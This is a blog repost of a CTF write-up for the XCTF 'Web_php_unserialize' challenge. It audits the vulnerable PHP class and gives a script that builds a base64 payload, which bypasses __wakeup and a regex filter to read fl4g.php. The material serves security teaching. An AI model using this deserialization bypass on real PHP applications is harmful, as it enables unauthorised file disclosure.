xctf php序列化,XCTF(Web_php_unserialize)

最新推荐文章于 2021-11-14 16:26:21 发布
最新推荐文章于 2021-11-14 16:26:21 发布
阅读量122 收藏
点赞数
文章标签: xctf php序列化

拿到题目,是个这,

3d9b70162c3738efc1d4380838728f99.png

我们来一波代码审计

1 <?php

2 class Demo {

3 private $file = 'index.php';

4 public function __construct($file) {

5 $this->file = $file; //构造函数,对类的变量进行初始化

6 }

7 function __destruct() {

8 echo @highlight_file($this->file, true);

9 }

10

11 //魔术方法,如果有反序列化的使用,在反序列化之前会先调用这个方法

12 function __wakeup() {

13 if ($this->file != 'index.php') {

14 //the secret is in the fl4g.php

15 $this->file = 'index.php';

16 }

17 }

18 }

19 if (isset($_GET['var'])) {

20 $var = base64_decode($_GET['var']);

21

22 //正则匹配,如果在var变量中存在O/C:数字(O:数字或者C:数字这样的形式}),不区分大小写,就输出stop hacking!否则的话就进行发序列化

23 if (preg_match('/[oc]:\d+:/i', $var)) {

24 die('stop hacking!');

25 } else {

26 @unserialize($var);

27 }

28 } else {

29 highlight_file("index.php");

30 }

31 ?>

审计完成之后,思路就很清晰了,对Demo这个类进行序列化,base64加密之后,赋值给var变量进行get传参就行了 在类Demo中有三个方法,一个构造,一个析构,还有就是一个魔术方法,构造函数__construct()在程序执行开始的时候对变量进行赋初值。析构函数__destruct(),在对象所在函数执行完成之后,会自动调用,这里就会高亮显示出文件。 在反序列化执行之前,会先执行__wakeup这个魔术方法,所以需要绕过,当成员属性数目大于实际数目时可绕过wakeup方法,正则匹配可以用+号来进行绕过。

写一个序列化的脚本

1 <?php

2 class Demo {

3 private $file = 'index.php';

4 public function __construct($file) {

5 $this->file = $file;

6 }

7 function __destruct() {

8 echo @highlight_file($this->file, true);

9 }

10 function __wakeup() {

11 if ($this->file != 'index.php') {

12 //the secret is in the fl4g.php

13 $this->file = 'index.php';

14 }

15 }

16 }

17

18 $a = new Demo("fl4g.php");

19 echo(serialize($a))."\n";

20 echo base64_encode('O:+4:"Demo":2:{s:10:" Demo file";s:8:"fl4g.php";}')."\n";

21

22 ?>

这里有个坑,这里的 file 变量为私有变量,所以序列化之后的字符串开头结 尾各有一个空白字符(即%00),字符串长度也比实际长度大 2,如果将序列化结 果复制到在线的 base64 网站进行编码可能就会丢掉空白字符,所以这里直接在 php 代码里进行编码。类似的还有 protected 类型的变量,序列化之后字符串首部会加上%00*%00

干脆写个python脚本

ca72655f75a08aac8df6caa1e5233a07.png

注意在python3中,字符串被b''包围,\0表示空格

php中也ok

396c5da14e9a5d1a83837292a7162709.png

标签:__,Web,序列化,index,file,var,php,XCTF

来源: https://www.cnblogs.com/zzjdbk/p/13022171.html

Microsoft资讯
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf+php序列化,CTF中的PHP序列化漏洞简单分析
weixin_39965881的博客
04-02 1730
本帖最后由 icq_8bf67fe65 于 2018-9-2 21:20 编辑本文原创作者:Versi0n,本文属i春秋原创奖励计划,未经许可禁止转载!一、前言在ctf比赛中,经常会遇到php序列化漏洞的题,今天就来简单分析下该漏洞的正确食用姿势~二、正文1.基础知识PHP序列化php为了方便进行数据的传输,允许把复杂的数据结构,压缩到一个字符串中,使用serialize()函数。PHP反序列...
xctf php序列化,xctf一道反序列化
weixin_39606575的博客
03-28 284
右键get源码:1
XCTF php2
qq_41941506的博客
05-13 3476
初次进入环境,出现如下图所示界面 先在域名中输入index.php欲要查看主页面,结果依旧是上述界面,此时,将php改为phps,尝试查看php源码,如下图所示 出现源码,代码审计,可以看出,get接受id=admin时,会出现key值,即可能出现flag,但是,当输入“?id=admin”时 会提示错误,故此,想到可能admin 被设为了敏感字符,造成了只要识别到admin就会...
xctf-unserialize3(php序列化学习记录)
qq_39670065的博客
09-26 415
class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 发现有__wakeup函数,这个函数是php中的一个magic函数,常用在反序列化操作中,如重新建立数据库连接,或执行其它初始化操作 先来学习一下php序列化与反序列化 序列化: 函数 : serialize() 把复杂的数据类型压缩到一个字符串中,数据类型可以是数组,字符串,对象等。序列化一个对象将会保存对象的所有变.
curl
csdn_jiangpeng的博客
01-16 205
/** * get * post方式请求资源 * @param string $url 基于的baseUrl * @param int $flag 标志位 * @param array $header 头部 * @return string 返回的资源内容 */ function curl_get($url, $flag = 0, $header = []) {...
PHP代码中的序列化与反序列化(1)
zezai3010的博客
12-01 2521
序列化就是使用serialize()将对象的用字符串的方式进行表示,反序列化是使用unserialize()将序列化的字符串,构造成相应的对象,反序列化序列化的逆过程。 0×00 序列化和反序列化 简单的理解:序列化就是使用serialize()将对象的用字符串的方式进行表示,反序列化是使用unserialize()将序列化的字符串,构造成相应的对象,反序列化序列化的逆过程。 
xctf.rar_HTML5自适应
09-19
在HTML5中,`<section>`、`<article>`和`<header>`等语义化标签为构建全屏滚动提供了便利。这些标签帮助定义了网页的结构,使得内容更有序,对搜索引擎友好,同时也方便开发者实现滚动效果。 平滑滚动是全屏滚动的...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训中,主要涵盖了Oracle系统的物料管理及相关流程,旨在提升用户对物料清单(BOM)的运用和理解。以下是详细的讲解内容: 1. **物料管理**: - **系统组织架构**:Oracle系统中的组织...
XCTF-高手进阶区:unserialize3
1stPeak's Blog
06-24 3861
XCTF-高手进阶区-第六题:unserialize3 目标: 了解php序列化中__wakeup漏洞的利用 了解php魔术方法 __construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toStri...
CTF-web_php_serialize序列化
Be Smart
02-24 848
一.根据题目猜测和反序列化漏洞有关 1.思路: 进入实验环境后,发现是一段php代码,通过接受get请求方式将提交过来的var的值, 先进行base64解码,再进行正则的判断,如果不匹配成功就会反序列化输入的参数值。 所以这里我们目的就是为了绕过正则表达式,让其反序列化出我们要的fl4g.php,再通过析构函数,高亮出fl4g文件中的内容。 2.步骤: 通过代码中的注释我们发现flag在fl4g.php这个文件里面,所以我们要将其序列化 编写一段代码先实例化我们要序列化的类,这里吧fl4g.php传进去,
XCTF-高手进阶区:Web_php_unserialize(详解)
1stPeak's Blog
02-29 3950
代码审计: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_fi...
php序列化(ctfshow)
unexpectedthing的博客
11-14 1384
文章目录简介入门反序列化中常见的魔法函数web254web255web256web257为什么需要用urlencode?web258web259介绍web260web261web262web264web263web265web266补充知识点php中输出打印的方式 简介 php序列化和反序列用到两个函数 序列化:serialize,将对象格式化为一个新的字符串 反序列化unserialize,将字符串还原为原来的对象。 一般在CTF中,可以通过自己写php代码,并传序列化后的代码,可以覆盖原来的代码,从而
攻防世界php2_攻防世界 WEB Web_php_unserialize
weixin_39649490的博客
12-19 169
0x00 - 题目描述PHP 反序列,老题新做了。打开 index.php 是这样的0x01 - 解题过程先审计一下代码,执行过程是从 17 行开始。123456789101112131415161718192021222324252627...
xctf_web Web_php_unserialize,关于php序列化的思考
fly夏天的博客
12-13 1636
先来看题目,题目说是php_unserialize可见是php序列化的题目。 打开网页时一段源码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } functi...
2019年中国民航大学电子制作比赛---蓝牙音响.zip
08-03
大学生参加学科竞赛有着诸多好处,不仅有助于个人综合素质的提升,还能为未来职业发展奠定良好基础。以下是一些分析: 首先,学科竞赛是提高专业知识和技能水平的有效途径。通过参与竞赛,学生不仅能够深入学习相关专业知识,还能够接触到最新的科研成果和技术发展趋势。这有助于拓展学生的学科视野,使其对专业领域有更深刻的理解。在竞赛过程中,学生通常需要解决实际问题,这锻炼了他们独立思考和解决问题的能力。 其次,学科竞赛培养了学生的团队合作精神。许多竞赛项目需要团队协作来完成,这促使学生学会有效地与他人合作、协调分工。在团队合作中,学生们能够学到如何有效沟通、共同制定目标和分工合作,这对于日后进入职场具有重要意义。 此外,学科竞赛是提高学生综合能力的一种途径。竞赛项目通常会涉及到理论知识、实际操作和创新思维等多个方面,要求参赛者具备全面的素质。在竞赛过程中,学生不仅需要展现自己的专业知识,还需要具备创新意识和解决问题的能力。这种全面的综合能力培养对于未来从事各类职业都具有积极作用。 此外,学科竞赛可以为学生提供展示自我、树立信心的机会。通过比赛的舞台,学生有机会展现自己在专业领域的优势,得到他人的认可和赞誉。这对于培养学生的自信心和自我价值感非常重要,有助于他们更加积极主动地投入学习和未来的职业生涯。 最后,学科竞赛对于个人职业发展具有积极的助推作用。在竞赛中脱颖而出的学生通常能够引起企业、研究机构等用人单位的关注。获得竞赛奖项不仅可以作为个人履历的亮点,还可以为进入理想的工作岗位提供有力的支持。
22NM60N-VB TO220一款N-Channel沟道TO220的MOSFET晶体管参数介绍与应用说明
最新发布
08-03
22NM60N-VB TO220;Package:TO220;Configuration:Single-N-Channel;VDS:650V;VGS:30(±V);Vth:3.5V;RDS(ON)=160mΩ@VGS=10V;ID:20A;Technology:SJ_Multi-EPI;
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个题目可以帮助参与者提升对于 SQL 注入漏洞的理解和防御能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值